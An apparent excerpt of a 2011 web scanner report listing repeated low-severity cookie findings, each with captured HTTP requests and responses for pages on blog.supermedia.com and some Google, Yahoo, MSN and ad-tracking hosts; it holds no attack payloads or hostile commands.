The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:26 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:26 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title> Allowing Employees to Work Remotely Could be a Win-Win for Your Business | SuperMedia Blog | ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/01/getting-in-shape-tips/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:18 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:18 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>3 Tips For Getting in Shape While Running a Business | SuperMedia Blog | SuperMedia.com</titl ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/01/how-to-use-op-ed-pages-to-promote-your-business/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:16 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:16 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>How to Use Op-Ed Pages to Promote Your Business | SuperMedia Blog | SuperMedia.com</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/01/starting-a-social-enterprise/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:28 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:28 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Starting A Social Enterprise | SuperMedia Blog | SuperMedia.com</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/01/videos-will-help-your-small-business/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:17 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:17 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>How Videos Will Help Your Small Business | SuperMedia Blog | SuperMedia.com</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/02/build-brand/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:15 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Upping Your Brand in 2011 | SuperMedia Blog | SuperMedia.com</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/02/go-marketing/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:15 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Go Guerrilla with Your Marketing | SuperMedia Blog | SuperMedia.com</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/02/planning-appreciation-events/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:15 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Planning Appreciation Events | SuperMedia Blog | SuperMedia.com</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/02/should-you-loan-money-to-employees/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:15 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Should You Loan Money to Your Employees? | SuperMedia Blog | SuperMedia.com</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /archives/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:30 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:30 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /archives/news/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:31 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:31 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /archives/newsletters/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:32 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:32 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /archives/press-releases/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:33 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:33 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /archives/tips/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:34 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /comment_form.php HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:34 GMT Server: Unspecified Content-Length: 37 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /comment_html.php HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:34 GMT Server: Unspecified Content-Length: 51 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: blog.supermedia.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763697|check#true#1296761897; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:36:43 GMT Server: Unspecified Cteonnt-Length: 328 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:51:43 GMT;path=/ Cache-Control: private Content-Length: 328
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /favicon.ico was not found on this server.</p> <p>Add ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /feed-icon-28x28.png HTTP/1.1 Host: blog.supermedia.com Proxy-Connection: keep-alive Referer: http://blog.supermedia.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; mbox=session#1296759528614-838261#1296763697|check#true#1296761897
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /feed/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:13 GMT Server: Unspecified Connection: close Content-Type: text/xml Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:13 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /feed/atom/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:13 GMT Server: Unspecified Connection: close Content-Type: text/xml Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:13 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /main.css HTTP/1.1 Host: blog.supermedia.com Proxy-Connection: keep-alive Referer: http://blog.supermedia.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763650|check#true#1296761850; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: blogsearch.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bkshp HTTP/1.1 Host: books.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:32:04 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=f09ac1e2ccf2b58a:TM=1296765124:LM=1296765124:S=VHIb6cqmET3q7qwK; expires=Sat, 02-Feb-2013 20:32:04 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: OFE/0.1 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /books HTTP/1.1 Host: books.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:31:57 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=6552b75bb12891c4:TM=1296765117:LM=1296765117:S=z2Yh1vRAeMtxN6LI; expires=Sat, 02-Feb-2013 20:31:57 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: OFE/0.1 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?pixid=99004680 HTTP/1.1 Host: bp.specificclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adp=7CUZ^0^8191; smdmp=7BUF:99061898^780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; adf=7CUZ^0^0; ug=uosDj9Liw_xRTA
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-store,no-cache,must-revalidate Cache-Control: post-check=0,pre-check=0 Pragma: no-cache p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA" Set-Cookie: adp=7CUZ^0^8191; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/ Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/ Set-Cookie: smdmp=7CVs:99004680^7BUF:99061898^780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/ Set-Cookie: adf=7CUZ^0^0; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/ p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA" Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/ p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA" Set-Cookie: nug=; Domain=.specificclick.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Location: http://www.googleadservices.com/pagead/conversion/1030885431/?label=z3WgCNenmAIQt6DI6wM&guid=ON&script=0 Content-Type: text/html Content-Length: 0 Date: Thu, 03 Feb 2011 19:03:58 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /buzz HTTP/1.1 Host: buzz.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:35:40 GMT Set-Cookie: B=fjoviv16km0sc&b=3&s=eo; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: of01e2=08556806c2aa36978721cfcb146d3d49; path=/; domain=buzz.yahoo.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, private Pragma: no-cache Location: http://login.yahoo.com/?.pd=c%3DhYw09vWp2e4FXlpTB9bd0rU-&.src=ybz&.intl=us&.done=http%3A%2F%2Fbuzz.yahoo.com%2Fvote%2F Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 83
<!-- fe13.buzz.re1.yahoo.com uncompressed/chunked Thu Feb 3 11:35:40 PST 2011 -->
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=89026872c5cc408f95bb663ec7f2d02f&udc=true&rnd=1296786631905&RedC=c.msn.com&MXFR=AD04D6F8B2FF44629973BD0674351135 HTTP/1.1 Accept: */* Referer: http://www.msn.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: c.redcated Proxy-Connection: Keep-Alive
Response
HTTP/1.1 302 Redirect Cache-Control: private, no-cache, proxy-revalidate Pragma: no-cache Location: http://c.msn.com/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=89026872c5cc408f95bb663ec7f2d02f&udc=true&rnd=1296786631905&MUID=AD04D6F8B2FF44629973BD0674351135 Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: MUID=AD04D6F8B2FF44629973BD0674351135; domain=.redcated; expires=Tue, 23-Aug-2011 02:29:39 GMT; path=/; Date: Fri, 04 Feb 2011 02:29:38 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /AVE/go/285974183/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
